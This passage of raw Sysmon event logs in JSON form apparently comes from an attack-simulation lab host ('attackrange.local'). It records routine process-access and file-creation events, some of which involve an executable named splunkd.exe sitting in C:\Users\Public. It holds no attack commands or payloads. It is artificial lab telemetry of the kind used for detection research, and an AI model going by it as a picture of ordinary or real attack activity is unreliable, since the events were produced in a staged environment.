(x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:30.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6953,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:59:30.867\r\nProcessGuid: {E2A3D6B1-12D1-5F25-0000-0010C2EA0900}\r\nProcessId: 4804\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12c4-0\\System.Drawing.dll\r\nCreationUtcTime: 2020-08-01 06:59:30.867","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:59:30.867","ProcessGuid":"{E2A3D6B1-12D1-5F25-0000-0010C2EA0900}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12c4-0\\System.Drawing.dll","CreationUtcTime":"2020-08-01 06:59:30.867","EventReceivedTime":"2020-08-01 06:59:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6954,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:30.930\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12D2-5F25-0000-001065F00900}\r\nTargetProcessId: 1492\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:30.930","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12D2-5F25-0000-001065F00900}","TargetProcessId":"1492","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6955,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:30.930\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12D2-5F25-0000-001065F00900}\r\nTargetProcessId: 1492\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:30.930","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12D2-5F25-0000-001065F00900}","TargetProcessId":"1492","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6956,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:30.930\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12D2-5F25-0000-001065F00900}\r\nTargetProcessId: 1492\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:30.930","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12D2-5F25-0000-001065F00900}","TargetProcessId":"1492","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6957,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:31.273\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12D3-5F25-0000-00106AF40900}\r\nTargetProcessId: 4512\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:31.273","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12D3-5F25-0000-00106AF40900}","TargetProcessId":"4512","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6958,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:31.273\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12D3-5F25-0000-00106AF40900}\r\nTargetProcessId: 4512\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:31.273","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12D3-5F25-0000-00106AF40900}","TargetProcessId":"4512","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6959,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:31.289\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12D3-5F25-0000-00106AF40900}\r\nTargetProcessId: 4512\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:31.289","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12D3-5F25-0000-00106AF40900}","TargetProcessId":"4512","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6960,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:31.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:31.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files 